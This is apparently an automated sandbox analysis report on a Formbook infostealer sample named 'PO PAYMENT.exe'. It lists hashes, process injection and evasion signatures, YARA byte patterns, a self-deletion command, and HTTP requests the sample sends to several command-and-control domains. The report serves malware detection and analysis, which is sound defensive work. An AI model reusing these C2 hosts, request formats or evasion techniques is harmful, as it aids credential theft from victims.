Analysis Report PO PAYMENT.exe

Overview

General Information

Sample Name: PO PAYMENT.exe
Analysis ID: 299520
MD5: 11b29ed0ff92f097e36f70ac86c2fc6a
SHA1: 7f32e89b30bcc0c8c3c38d8eaa2a013ca3dd56e7
SHA256: f358e7685d05c3fbc7d93bd7641276df66c9587065c2643f698324b4f99da2c1
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • PO PAYMENT.exe (PID: 4704 cmdline: 'C:\Users\user\Desktop\PO PAYMENT.exe' MD5: 11B29ED0FF92F097E36F70AC86C2FC6A)
    • PO PAYMENT.exe (PID: 6212 cmdline: {path} MD5: 11B29ED0FF92F097E36F70AC86C2FC6A)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • explorer.exe (PID: 5712 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • cmd.exe (PID: 6456 cmdline: /c del 'C:\Users\user\Desktop\PO PAYMENT.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.388013673.00000000013E0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.388013673.00000000013E0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.388013673.00000000013E0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.604664988.0000000004F10000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.604664988.0000000004F10000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.PO PAYMENT.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.PO PAYMENT.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.PO PAYMENT.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
1.2.PO PAYMENT.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.PO PAYMENT.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: PO PAYMENT.exe | ReversingLabs: Detection: 35%
Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.388013673.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.604664988.0000000004F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.351324564.0000000003EBA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.386845572.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.602944720.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.388044010.0000000001410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.604710630.0000000004F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.PO PAYMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.PO PAYMENT.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: PO PAYMENT.exe | Joe Sandbox ML: detected
Source: 1.2.PO PAYMENT.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 4x nop then pop ebx 1_2_00407AFA
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 4x nop then pop edi 1_2_00416CA2
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 4x nop then pop ebx 5_2_00DD7AFB
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 4x nop then pop edi 5_2_00DE6CA2

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 185.53.178.13:80 -> 192.168.2.6:49753
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.65:80 -> 192.168.2.6:49754
Source: global traffic | HTTP traffic detected: GET /t65/?Bj=lHLHKJ1PWrzp&ITlpdJj=yQFTBbedMWyGwOKDiRRIkYFp9ZOzxKlpHdYsuqtEdMvycNIoiSUE5DSoMDD6ypCOFx2Pf+vG9Q== HTTP/1.1 | Host: www.bestphotographyaccessories.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /t65/?ITlpdJj=nm2HEmHfX7D9IUvk7dYYuraDZ4J224QDqtwcpS7fnC6ZsYfhA0Kh7m5n1GflF18RnRA50mhqNA==&Bj=lHLHKJ1PWrzp HTTP/1.1 | Host: www.freddyvan.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /t65/?Bj=lHLHKJ1PWrzp&ITlpdJj=RR7cdlzcGGD1CgyucU/iYrLCgnJFGv4C+0f5oOXcjqEcHGyNTWv4CuiM/WZXjqRjmOEsXv956w== HTTP/1.1 | Host: www.assetprotectionguru.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /t65/?ITlpdJj=X8t833tTMXMhz+ECWQ8H4g63xvRVR3b4PK/YZLwOkYgqnjBDLD8Hz5TgbO2W76sJvb9ccrlwWQ==&Bj=lHLHKJ1PWrzp HTTP/1.1 | Host: www.ousticky.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | ASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
Source: Joe Sandbox View | ASN Name: AMAZON-AESUS AMAZON-AESUS
Source: Joe Sandbox View | ASN Name: AMAZON-AESUS AMAZON-AESUS
Source: unknown | DNS traffic detected: queries for: www.bestphotographyaccessories.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Cache-Control: private | Content-Type: text/html; charset=utf-8 | Date: Fri, 16 Oct 2020 19:15:52 GMT | Connection: close | Content-Length: 1343
Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.352476611.000000000095C000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.367753228.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: PO PAYMENT.exe, 00000000.00000002.348778465.0000000001280000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.388013673.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.604664988.0000000004F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.351324564.0000000003EBA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.386845572.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.602944720.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.388044010.0000000001410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.604710630.0000000004F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.PO PAYMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.PO PAYMENT.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000001.00000002.388013673.00000000013E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.388013673.00000000013E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.604664988.0000000004F10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.604664988.0000000004F10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.351324564.0000000003EBA000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.351324564.0000000003EBA000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.386845572.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.386845572.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.602944720.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.602944720.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.388044010.0000000001410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.388044010.0000000001410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.604710630.0000000004F40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.604710630.0000000004F40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.2.PO PAYMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.PO PAYMENT.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.2.PO PAYMENT.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.PO PAYMENT.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: PO PAYMENT.exe
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_00419D60 NtCreateFile,1_2_00419D60
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_00419E10 NtReadFile,1_2_00419E10
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_00419E90 NtClose,1_2_00419E90
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_00419F40 NtAllocateVirtualMemory,1_2_00419F40
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_00419D5F NtCreateFile,1_2_00419D5F
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_00419E5A NtClose,1_2_00419E5A
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_00419E8A NtClose,1_2_00419E8A
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_00419F3A NtAllocateVirtualMemory,1_2_00419F3A
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_01589910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_01589910
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_015899A0 NtCreateSection,LdrInitializeThunk,1_2_015899A0
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_01589840 NtDelayExecution,LdrInitializeThunk,1_2_01589840
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_01589860 NtQuerySystemInformation,LdrInitializeThunk,1_2_01589860
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_015898F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_015898F0
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_01589A50 NtCreateFile,LdrInitializeThunk,1_2_01589A50
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_01589A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_01589A00
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_01589A20 NtResumeThread,LdrInitializeThunk,1_2_01589A20
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_01589540 NtReadFile,LdrInitializeThunk,1_2_01589540
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_015895D0 NtClose,LdrInitializeThunk,1_2_015895D0
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_01589710 NtQueryInformationToken,LdrInitializeThunk,1_2_01589710
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_01589780 NtMapViewOfSection,LdrInitializeThunk,1_2_01589780
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_015897A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_015897A0
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_01589660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_01589660
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_015896E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_015896E0
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_01589950 NtQueueApcThread,1_2_01589950
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_015899D0 NtCreateProcessEx,1_2_015899D0
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_0158B040 NtSuspendThread,1_2_0158B040
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_01589820 NtEnumerateKey,1_2_01589820
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_015898A0 NtWriteVirtualMemory,1_2_015898A0
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_01589B00 NtSetValueKey,1_2_01589B00
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_0158A3B0 NtGetContextThread,1_2_0158A3B0
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_01589A10 NtQuerySection,1_2_01589A10
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_01589A80 NtOpenDirectoryObject,1_2_01589A80
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_01589560 NtWriteFile,1_2_01589560
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_0158AD30 NtSetContextThread,1_2_0158AD30
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_01589520 NtWaitForSingleObject,1_2_01589520
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_015895F0 NtQueryInformationFile,1_2_015895F0
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_0158A770 NtOpenThread,1_2_0158A770
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_01589770 NtSetInformationFile,1_2_01589770
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_01589760 NtOpenProcess,1_2_01589760
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_0158A710 NtOpenProcessToken,1_2_0158A710
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_01589730 NtQueryVirtualMemory,1_2_01589730
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_01589FE0 NtCreateMutant,1_2_01589FE0
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_01589650 NtQueryValueKey,1_2_01589650
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_01589670 NtQueryInformationProcess,1_2_01589670
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_01589610 NtEnumerateValueKey,1_2_01589610
Source: C:\Users\user\Desktop\PO PAYMENT.exe | Code function: 1_2_015896D0 NtCreateKey,1_2_015896D0
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_05389540 NtReadFile,LdrInitializeThunk,5_2_05389540
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_053895D0 NtClose,LdrInitializeThunk,5_2_053895D0
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_05389710 NtQueryInformationToken,LdrInitializeThunk,5_2_05389710
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_05389780 NtMapViewOfSection,LdrInitializeThunk,5_2_05389780
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_05389FE0 NtCreateMutant,LdrInitializeThunk,5_2_05389FE0
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_05389660 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_05389660
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_05389650 NtQueryValueKey,LdrInitializeThunk,5_2_05389650
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_053896E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_053896E0
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_053896D0 NtCreateKey,LdrInitializeThunk,5_2_053896D0
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_05389910 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_05389910
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_053899A0 NtCreateSection,LdrInitializeThunk,5_2_053899A0
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_05389860 NtQuerySystemInformation,LdrInitializeThunk,5_2_05389860
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_05389840 NtDelayExecution,LdrInitializeThunk,5_2_05389840
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_05389A50 NtCreateFile,LdrInitializeThunk,5_2_05389A50
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_0538AD30 NtSetContextThread,5_2_0538AD30
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_05389520 NtWaitForSingleObject,5_2_05389520
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_05389560 NtWriteFile,5_2_05389560
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_053895F0 NtQueryInformationFile,5_2_053895F0
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_05389730 NtQueryVirtualMemory,5_2_05389730
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_0538A710 NtOpenProcessToken,5_2_0538A710
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_0538A770 NtOpenThread,5_2_0538A770
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_05389770 NtSetInformationFile,5_2_05389770
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_05389760 NtOpenProcess,5_2_05389760
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_053897A0 NtUnmapViewOfSection,5_2_053897A0
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_05389610 NtEnumerateValueKey,5_2_05389610
